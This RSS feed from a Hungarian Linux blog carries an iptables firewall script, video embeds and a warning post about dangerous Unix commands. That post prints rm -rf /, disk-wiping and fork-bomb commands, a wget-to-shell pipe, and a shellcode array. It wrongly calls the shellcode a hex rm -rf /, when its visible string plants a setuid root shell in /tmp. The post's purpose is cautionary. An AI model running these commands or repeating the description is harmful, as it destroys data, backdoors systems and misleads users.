<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Pingvinsimogató.hu</title>
	<atom:link href="http://pingvinsimogato.hu/feed/" rel="self" type="application/rss+xml" />
	<link>http://pingvinsimogato.hu</link>
	<description>... cikkek a Linux/Unix világából...</description>
	<lastBuildDate>Mon, 16 Aug 2010 11:26:08 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>Tűzfalszkript 1.</title>
		<link>http://pingvinsimogato.hu/szkript/tuzfalszkript-1/</link>
		<comments>http://pingvinsimogato.hu/szkript/tuzfalszkript-1/#comments</comments>
		<pubDate>Mon, 16 Aug 2010 11:26:08 +0000</pubDate>
		<dc:creator>Német Krisztián</dc:creator>
				<category><![CDATA[biztonság]]></category>
		<category><![CDATA[szkript]]></category>
		<category><![CDATA[bash szkript]]></category>
		<category><![CDATA[iptables]]></category>
		<category><![CDATA[tűzfal]]></category>

		<guid isPermaLink="false">http://pingvinsimogato.hu/?p=127</guid>
		<description><![CDATA[#!/bin/bash echo 1 > /proc/sys/net/ipv4/ip_forward ## Az eddigi szabályok törlése iptables -F INPUT iptables -F OUTPUT iptables -F FORWARD ## Az alap szabályok felállítása iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P FORWARD ACCEPT ## LOGDROP szabály iptables -F LOGDROP 2>/dev/null iptables -X LOGDROP 2>/dev/null iptables -N LOGDROP iptables -A LOGDROP -j LOG [...]]]></description>
			<content:encoded><![CDATA[<pre lang="bash">
#!/bin/bash

echo 1 > /proc/sys/net/ipv4/ip_forward

## Az eddigi szabályok törlése
iptables -F INPUT
iptables -F OUTPUT
iptables -F FORWARD

## Az alap szabályok felállítása
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -P FORWARD ACCEPT

## LOGDROP szabály
iptables -F LOGDROP 2>/dev/null
iptables -X LOGDROP 2>/dev/null
iptables -N LOGDROP
iptables -A LOGDROP -j LOG
iptables -A LOGDROP -j DROP

## Maszkolás
iptables -t nat -F PREROUTING
iptables -t nat -F POSTROUTING
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -j SNAT --to 64.81.39.24

## Tűzfal szabályok felállítása

iptables -A INPUT -i eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT

#* FTP, SSH, Telnet Portok megnyitása
iptables -A INPUT --proto tcp -i eth0 --destination-port 20:23 -j ACCEPT

#* Mail Portok megnyitása
iptables -A INPUT --proto tcp -i eth0 --destination-port 25 -j ACCEPT
iptables -A INPUT --proto tcp -i eth0 --destination-port 110 -j ACCEPT

#* HTTP &#038; HTTPS Portok megnyitása
iptables -A INPUT --proto tcp -i eth0 --destination-port 80 -j ACCEPT
iptables -A INPUT --proto tcp -i eth0 --destination-port 443 -j ACCEPT

#* IDENTD Port megnyitása
iptables -A INPUT --proto tcp -i eth0 --destination-port 113 -j ACCEPT

#* User Portok megnyitása
iptables -A INPUT --proto tcp -i eth0 --destination-port 1024:65535 -j ACCEPT
iptables -A INPUT --proto udp -i eth0 --destination-port 1024:65535 -j ACCEPT

#* DNS
iptables -A INPUT --proto tcp -i eth0 --destination-port 53 -j ACCEPT
iptables -A INPUT --proto udp -i eth0 --destination-port 53 -j ACCEPT
iptables -A INPUT --proto tcp -i eth0 --destination-port 137:138 -j ACCEPT
iptables -A INPUT --proto udp -i eth0 --destination-port 137:138 -j ACCEPT

#* Talk Port
iptables -A INPUT --proto udp -i eth0 --destination-port 517:518 -j ACCEPT

#* ICMP Replies
iptables -A INPUT -i eth0 --proto icmp --jump ACCEPT

iptables -A OUTPUT --proto tcp --destination-port 2611 -j LOGDROP

#* Az összes többi port tiltása
iptables -A INPUT -i eth0 -j LOGDROP

## Port Forwarding For NAT

#* ICQ portjainak engedélyezése
iptables -A PREROUTING -t nat -p udp -d 64.81.39.24 --dport 4000 -j DNAT --to 192.168.1.2
iptables -A PREROUTING -t nat -p tcp -d 64.81.39.24 --dport 20020:20039 -j DNAT --to 192.168.1.2

#* WebCam Software portjainak engedélyezése
iptables -A PREROUTING -t nat -p tcp -d 64.81.39.24 --dport 2047:2048 -j DNAT --to 192.168.1.1
iptables -A PREROUTING -t nat -p udp -d 64.81.39.24 --dport 2047:2048 -j DNAT --to 192.168.1.1
iptables -A PREROUTING -t nat -p udp -d 64.81.39.24 --dport 1972 -j DNAT --to 192.168.1.1

# Unreal Tournament portjainak engedélyezése
iptables -A PREROUTING -t nat -p tcp -d 64.81.39.24 --dport 7600:7900 -j DNAT --to 192.168.1.1
iptables -A PREROUTING -t nat -p udp -d 64.81.39.24 --dport 7600:7900 -j DNAT --to 192.168.1.1

iptables -A PREROUTING -t nat -p udp -d 64.81.39.24 --dport 3782 -j DNAT --to 192.168.1.2
</pre>
]]></content:encoded>
			<wfw:commentRss>http://pingvinsimogato.hu/szkript/tuzfalszkript-1/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>7 Unix parancs, amit soha ne adj ki!</title>
		<link>http://pingvinsimogato.hu/uzemeltetes/7_unix_parancs_amit_soha_ne_adj_ki/</link>
		<comments>http://pingvinsimogato.hu/uzemeltetes/7_unix_parancs_amit_soha_ne_adj_ki/#comments</comments>
		<pubDate>Mon, 16 Aug 2010 11:10:53 +0000</pubDate>
		<dc:creator>Német Krisztián</dc:creator>
				<category><![CDATA[üzemeltetés]]></category>
		<category><![CDATA[rm]]></category>
		<category><![CDATA[tiltott parancsok]]></category>
		<category><![CDATA[törlés]]></category>

		<guid isPermaLink="false">http://pingvinsimogato.hu/?p=122</guid>
		<description><![CDATA[Egy linuxos fórumot olvasva jött elő ennek a bejegyzésnek az ötlete. Ezen a fórumon volt egy vicces bejegyzés: Hogyan keressünk Linux alatt RealMedia file-okat? rm = Real Media -f = full (az összeset) / = az egész lemezen Kezdő felhasználóknak ez nagyon veszélyes, ugyanis a mást jelent ez a parancssor. 1. Parancs, amit soha nem [...]]]></description>
			<content:encoded><![CDATA[<p>Egy linuxos fórumot olvasva jött elő ennek a bejegyzésnek az ötlete. Ezen a fórumon volt egy vicces bejegyzés:</p>
<p>Hogyan keressünk Linux alatt RealMedia file-okat?<br /><span id="more-122"></span><br />
rm = Real Media<br />
-f = full (az összeset)<br />
/ = az egész lemezen</p>
<p>Kezdő felhasználóknak ez nagyon veszélyes, ugyanis a mást jelent ez a parancssor.</p>
<p>1. Parancs, amit soha nem adok ki</p>
<pre>rm -rf /</pre>
<p>Ez a parancs rekurzíven (alkönyvtárakban is) és kényszerítetten (kérdezés nélkül mindent) töröl mindent a gyökér könyvtáron belül. (vagyis az egész rendszert)</p>
<p>2. Parancs, amit soha nem adok ki</p>
<p>char esp[] __attribute__ ((section(&#8220;.text&#8221;))) /* e.s.p<br />
release */<br />
= &#8220;\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68&#8243;<br />
&#8220;\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99&#8243;<br />
&#8220;\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7&#8243;<br />
&#8220;\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56&#8243;<br />
&#8220;\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31&#8243;<br />
&#8220;\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69&#8243;<br />
&#8220;\x6e\x2f\x73\x68\x00\x2d\x63\x00&#8243;<br />
&#8220;cp -p /bin/sh /tmp/.beyond; chmod 4755<br />
/tmp/.beyond;&#8221;;</pre>
<p>A hexadecimális verziója a rm -rf / parancsnak ez éppen eléggé meg tudja téveszteni a tapasztalatlan Linuxost...</p>
<p>3. Parancs, amit soha nem adok ki</p>
<pre>mkfs.ext3 /dev/sda</pre>
<p>Újraformázza vagyis kitörli az összes fájlodat az adott eszközről (merevlemezről) (Készít egy ext3 partíciót az /dev/sda eszközön.)</p>
<p>4. Parancs, amit soha nem adok ki</p>
<p> <img src='http://pingvinsimogato.hu/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> ){:|:&#038;};:</p>
<p>Ez egy ismert forkbomb, ez azt mondja a rendszerednek hogy futtasson nagy számú processzt addig amíg le nem fagy a gép. Ez gyakran vezet adatvesztéshez.</p>
<p>5. Parancs, amit soha nem adok ki</p>
<p>bármilyen parancs > /dev/sda</p>
<p>Ezzel a paranccsal nyers adatokat írsz egy blokkeszközre ami általában kiüti a fájlrendszert teljes adatvesztést eredményezve.</p>
<p>6. Parancs, amit soha nem adok ki</p>
<p>wget http://bármilyen_link/alexandra_diamond.jpg -O- | sh</p>
<p>Soha ne tölts le nem megbízható forrásból (wget), és utána ne futtasd automatkusan ( | sh), mert lehet hogy rosszindulatú kódot tartalmaz.</p>
<p>7. Parancs, amit soha nem adok ki</p>
<p>mv /home/home_könyvtárad/* /dev/null</p>
<p>Ez áthelyez minden fájlt a home könyvtáradból egy 'fekete lyukba', egy olyan helyre aminek nincs elérése, nincs kijárata csak bejárata van. Ami egyszer ide bekerül, azt soha nem látod viszont.</p>
]]></content:encoded>
			<wfw:commentRss>http://pingvinsimogato.hu/uzemeltetes/7_unix_parancs_amit_soha_ne_adj_ki/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Szerver virtualizációs technológiák III.</title>
		<link>http://pingvinsimogato.hu/video/szerver-virtualizacios-technologiak-iii/</link>
		<comments>http://pingvinsimogato.hu/video/szerver-virtualizacios-technologiak-iii/#comments</comments>
		<pubDate>Thu, 29 Jul 2010 13:50:20 +0000</pubDate>
		<dc:creator>Német Krisztián</dc:creator>
				<category><![CDATA[video]]></category>
		<category><![CDATA[virtualizáció]]></category>

		<guid isPermaLink="false">http://pingvinsimogato.hu/?p=102</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><span id="more-102"></span><br />
<script src="http://videotorium.hu/hu/embed/354.js" type="text/javascript"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://pingvinsimogato.hu/video/szerver-virtualizacios-technologiak-iii/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Központi menedzselhető tűzfal megvalósítása LDAP segítségével</title>
		<link>http://pingvinsimogato.hu/video/kozponti-menedzselheto-tuzfal-megvalositasa-ldap-segitsegevel/</link>
		<comments>http://pingvinsimogato.hu/video/kozponti-menedzselheto-tuzfal-megvalositasa-ldap-segitsegevel/#comments</comments>
		<pubDate>Thu, 29 Jul 2010 13:11:40 +0000</pubDate>
		<dc:creator>Német Krisztián</dc:creator>
				<category><![CDATA[video]]></category>
		<category><![CDATA[ldap]]></category>
		<category><![CDATA[tűzfal]]></category>

		<guid isPermaLink="false">http://pingvinsimogato.hu/?p=86</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><span id="more-86"></span><br />
<script src="http://videotorium.hu/hu/embed/1069.js" type="text/javascript"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://pingvinsimogato.hu/video/kozponti-menedzselheto-tuzfal-megvalositasa-ldap-segitsegevel/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Naplózó infrastruktúra Syslog-ng-vel</title>
		<link>http://pingvinsimogato.hu/video/naplozo-infrastruktura-syslog-ng-vel/</link>
		<comments>http://pingvinsimogato.hu/video/naplozo-infrastruktura-syslog-ng-vel/#comments</comments>
		<pubDate>Thu, 29 Jul 2010 13:06:15 +0000</pubDate>
		<dc:creator>Német Krisztián</dc:creator>
				<category><![CDATA[video]]></category>
		<category><![CDATA[naplózás]]></category>
		<category><![CDATA[syslog-ng]]></category>

		<guid isPermaLink="false">http://pingvinsimogato.hu/?p=84</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><span id="more-84"></span><br />
<script src="http://videotorium.hu/hu/embed/1831.js" type="text/javascript"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://pingvinsimogato.hu/video/naplozo-infrastruktura-syslog-ng-vel/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Különböző hálózatok összekapcsolása, Samba III.</title>
		<link>http://pingvinsimogato.hu/video/kulonbozo-halozatok-osszekapcsolasa-samba-iii/</link>
		<comments>http://pingvinsimogato.hu/video/kulonbozo-halozatok-osszekapcsolasa-samba-iii/#comments</comments>
		<pubDate>Thu, 29 Jul 2010 13:03:39 +0000</pubDate>
		<dc:creator>Német Krisztián</dc:creator>
				<category><![CDATA[video]]></category>
		<category><![CDATA[samba]]></category>

		<guid isPermaLink="false">http://pingvinsimogato.hu/?p=82</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><span id="more-82"></span><br />
<script src="http://videotorium.hu/hu/embed/988.js" type="text/javascript"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://pingvinsimogato.hu/video/kulonbozo-halozatok-osszekapcsolasa-samba-iii/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Különböző hálózatok összekapcsolása, Samba II.</title>
		<link>http://pingvinsimogato.hu/video/kulonbozo-halozatok-osszekapcsolasa-samba-ii/</link>
		<comments>http://pingvinsimogato.hu/video/kulonbozo-halozatok-osszekapcsolasa-samba-ii/#comments</comments>
		<pubDate>Thu, 29 Jul 2010 13:01:48 +0000</pubDate>
		<dc:creator>Német Krisztián</dc:creator>
				<category><![CDATA[video]]></category>
		<category><![CDATA[samba]]></category>

		<guid isPermaLink="false">http://pingvinsimogato.hu/?p=80</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><span id="more-80"></span><br />
<script src="http://videotorium.hu/hu/embed/987.js" type="text/javascript"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://pingvinsimogato.hu/video/kulonbozo-halozatok-osszekapcsolasa-samba-ii/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Szerver virtualizációs technológiák I.</title>
		<link>http://pingvinsimogato.hu/video/szerver-virtualizacios-technologiak-i/</link>
		<comments>http://pingvinsimogato.hu/video/szerver-virtualizacios-technologiak-i/#comments</comments>
		<pubDate>Thu, 29 Jul 2010 12:57:46 +0000</pubDate>
		<dc:creator>Német Krisztián</dc:creator>
				<category><![CDATA[video]]></category>
		<category><![CDATA[virtualizáció]]></category>

		<guid isPermaLink="false">http://pingvinsimogato.hu/?p=75</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><span id="more-75"></span><br />
<script src="http://videotorium.hu/hu/embed/352.js" type="text/javascript"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://pingvinsimogato.hu/video/szerver-virtualizacios-technologiak-i/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Különböző hálózatok összekapcsolása, Samba I.</title>
		<link>http://pingvinsimogato.hu/video/kulonbozo-halozatok-osszekapcsolasa-samba-i/</link>
		<comments>http://pingvinsimogato.hu/video/kulonbozo-halozatok-osszekapcsolasa-samba-i/#comments</comments>
		<pubDate>Thu, 29 Jul 2010 12:53:43 +0000</pubDate>
		<dc:creator>Német Krisztián</dc:creator>
				<category><![CDATA[video]]></category>
		<category><![CDATA[samba]]></category>

		<guid isPermaLink="false">http://pingvinsimogato.hu/?p=72</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><span id="more-72"></span><br />
<script src="http://videotorium.hu/hu/embed/986.js" type="text/javascript"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://pingvinsimogato.hu/video/kulonbozo-halozatok-osszekapcsolasa-samba-i/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Szerver virtualizációs technológiák II.</title>
		<link>http://pingvinsimogato.hu/video/szerver-virtualizacios-technologiak-ii/</link>
		<comments>http://pingvinsimogato.hu/video/szerver-virtualizacios-technologiak-ii/#comments</comments>
		<pubDate>Thu, 29 Jul 2010 12:44:03 +0000</pubDate>
		<dc:creator>Német Krisztián</dc:creator>
				<category><![CDATA[video]]></category>
		<category><![CDATA[virtualizáció]]></category>

		<guid isPermaLink="false">http://pingvinsimogato.hu/?p=70</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<p><span id="more-70"></span><br />
<script src="http://videotorium.hu/hu/embed/353.js" type="text/javascript"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://pingvinsimogato.hu/video/szerver-virtualizacios-technologiak-ii/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
